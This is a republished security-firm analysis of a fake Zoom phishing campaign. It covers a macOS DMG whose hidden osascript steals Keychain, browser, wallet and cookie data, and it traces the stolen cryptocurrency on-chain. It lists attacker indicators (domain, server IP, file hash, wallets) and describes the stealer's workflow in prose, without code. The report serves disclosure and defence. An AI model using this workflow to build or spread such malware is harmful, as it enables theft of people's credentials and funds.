Fake Zoom conference phishing leads to millions of dollars in losses: A deep dive into the attack methods

A sophisticated phishing campaign using fake Zoom meeting links has resulted in millions of dollars in cryptocurrency losses. Attackers use domains like "app[.]us4zoom[.]us" to create convincing fake pages that download a malicious file named "ZoomApp_v.3.14.dmg" instead of launching Zoom.

Attack Method: The malware, executed via a terminal script, tricks users into entering their password. It then collects system data, browser information, encrypted wallet data, and KeyChain passwords, sending it all to a server controlled by the hackers.
Attribution & Tracking: Analysis suggests the hacker may be Russian, using a Telegram API for monitoring. The malicious server IP (141.98.9.20) is located in the Netherlands.
On-chain Impact: One analyzed hacker address (0x9fd1...6ac) profited over $1 million. Stolen funds were laundered through various addresses and ultimately sent to exchanges like Binance, MEXC, Gate.io, and ChangeNOW.
Recommendations: Users are urged to meticulously verify meeting links before clicking, avoid executing software or commands from unknown sources, and maintain updated antivirus software.

Original title: "Seeing is not believing | Analysis of fake Zoom meeting phishing"

Original Source: SlowMist Technology

Editor's Note: Phishing incidents using fake Zoom meeting links have recently become increasingly common in the crypto market. First, EurekaTrading founder Kuan Sun was targeted by a $13 million phishing attack after mistakenly believing a fake conference invitation and installing a malicious plugin. Fortunately, the Venus Protocol urgently suspended operations, and with the assistance of multiple security teams, the funds were ultimately recovered.

On September 8th, Alexander Choi, founder of the crypto trading community Fortune Collective, also published a post revealing that he connected with a fake project through private messages on the X platform. During the conversation, he accidentally clicked on a fraudulent link disguised as a conference, resulting in a loss of nearly $1 million. Why are fake Zoom conference phishing scams so successful? And how can investors avoid them and protect their funds? This article was first published on December 27, 2024. The original text is as follows:

background

Recently, multiple users on X reported a phishing attack disguised as a Zoom meeting link. One victim, after clicking on the malicious Zoom meeting link, installed malware, resulting in the theft of millions of dollars in cryptocurrency. In response, the SlowMist security team analyzed this phishing incident and attack method, and tracked the hacker's funds.

 ( https://x.com/lsp8940/status/1871350801270296709 )

Phishing link analysis

Hackers used domain names such as "app[.]us4zoom[.]us" to disguise themselves as normal Zoom meeting links. The pages were highly similar to real Zoom meetings. When users clicked the "Start Meeting" button, it would trigger the download of a malicious installation package instead of launching the local Zoom client.

By detecting the above domain name, we found the hacker's monitoring log address (https[:]//app[.]us4zoom[.]us/error_log).

Decryption revealed that this was a log entry when the script attempted to send a message via the Telegram API, and the language used was Russian.

The site was deployed online 27 days ago. The hacker may be Russian and started looking for targets on November 14. He then used the Telegram API to monitor whether any targets clicked the download button on the phishing page.

Malware Analysis

The malicious installation package file is named "ZoomApp_v.3.14.dmg". The following is the interface opened by the Zoom phishing software, which tricks users into executing the ZoomApp.file malicious script in Terminal and also tricks users into entering their local password during the execution process.

The following is the execution content of the malicious file:

After decoding the above content, it was found that it was a malicious osascript script.

Further analysis revealed that the script searches for a hidden executable file named ".ZoomApp" and runs it locally. Disk analysis of the original installation package, "ZoomApp_v.3.14.dmg," revealed that the installation package indeed contained a hidden executable file named ".ZoomApp."

Malicious behavior analysis

Static Analysis

We uploaded the binary file to the threat intelligence platform for analysis and found that it had been marked as malicious.

 (https://www.virustotal.com/gui/file/e4b6285e183dd5e1c4e9eaf30cec886fd15293205e706855a48b30c890cbf5f2)

Through static disassembly analysis, the following figure shows the entry code of the binary file, which is used for data decryption and script execution.

The picture below is the data part. You can see that most of the information has been encrypted and encoded.

After decrypting the data, it was found that the binary file also ultimately executed a malicious osascript script (the full decryption code has been shared at: https://pastebin.com/qRYQ44xa), which collects information on the user's device and sends it to the backend.

The following figure is part of the code that enumerates the path information of different plug-in IDs.

The following figure is part of the code for reading the computer KeyChain information.

After the malicious code collects system information, browser data, encrypted wallet data, Telegram data, Notes data, and cookie data, it compresses them and sends them to the server controlled by the hacker (141.98.9.20).

Since the malicious program tricks the user into entering a password when it is running, and subsequent malicious scripts also collect the KeyChain data in the computer (which may include various passwords saved by the user on the computer), hackers will try to decrypt the data after collecting it, obtain the user's wallet mnemonics, private keys and other sensitive information, and thus steal the user's assets.

According to analysis, the IP address of the hacker's server is located in the Netherlands and has been marked as malicious by the threat intelligence platform.

 ( https://www.virustotal.com/gui/ip-address/141.98.9.20 )

Dynamic Analysis

The malicious program is dynamically executed in a virtual environment and the process is analyzed. The figure below shows the monitoring information of the malicious program collecting local data processes and sending data to the background process.

MistTrack Analysis

We used the on-chain tracking tool MistTrack to analyze the hacker address 0x9fd15727f43ebffd0af6fecf6e01a810348ee6ac provided by the victim: the hacker address made a profit of over 1 million US dollars, including USD0++, MORPHO and ETH; among them, USD0++ and MORPHO were exchanged for 296 ETH.

According to MistTrack, the hacker's address received a small amount of ETH from the address 0xb01caea8c6c47bbf4f4b4c5080ca642043359c2e, which appears to be used to provide transaction fees. This address (0xb01c) only has a single source of income, yet it has transferred small amounts of ETH to nearly 8,800 addresses, suggesting it is a platform dedicated to providing transaction fees.

Filtering the addresses marked as malicious among the transfer objects of this address (0xb01c), we found that they were associated with two phishing addresses, one of which was marked as Pink Drainer. Further analysis of these two phishing addresses showed that the funds were basically transferred to ChangeNOW and MEXC.

Then we analyzed the transfer of the stolen funds. A total of 296.45 ETH was transferred to the new address 0xdfe7c22a382600dcffdde2c51aaa73d788ebae95.

The first transaction of the new address (0xdfe7) was in July 2023, involving multiple chains, and the current balance is 32.81 ETH.

The main ETH withdrawal paths from the new address (0xdfe7) are as follows:

· 200.79 ETH -> 0x19e0…5c98f

63.03 ETH -> 0x41a2…9c0b

8.44 ETH -> Converted to 15,720 USDT

14.39 ETH -> Gate.io

Subsequent transfers from these extended addresses were linked to various platforms, including Bybit, Cryptomus.com, Swapspace, Gate.io, and MEXC, and were associated with multiple addresses marked as Angel Drainer and Theft by MistTrack. Additionally, 99.96 ETH currently resides at address 0x3624169dfeeead9f3234c0ccd38c3b97cecafd01.

There are also many USDT transaction traces in the new address (0xdfe7), which have been transferred to platforms such as Binance, MEXC, and FixedFloat.

Summarize

The phishing scheme described here involves hackers disguising themselves as legitimate Zoom meeting links, tricking users into downloading and executing malware. This malware typically has multiple destructive capabilities, including collecting system information, stealing browser data, and obtaining cryptocurrency wallet information. This data is then transmitted to hacker-controlled servers. This type of attack often combines social engineering and Trojan horse attacks, making it easy for unwary users to fall prey. The SlowMist Security Team recommends users carefully verify meeting links before clicking them, avoid executing software and commands from unknown sources, and install and regularly update antivirus software. For more security information, please read the SlowMist Security Team's "Blockchain Dark Forest Self-Guard Handbook": https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md.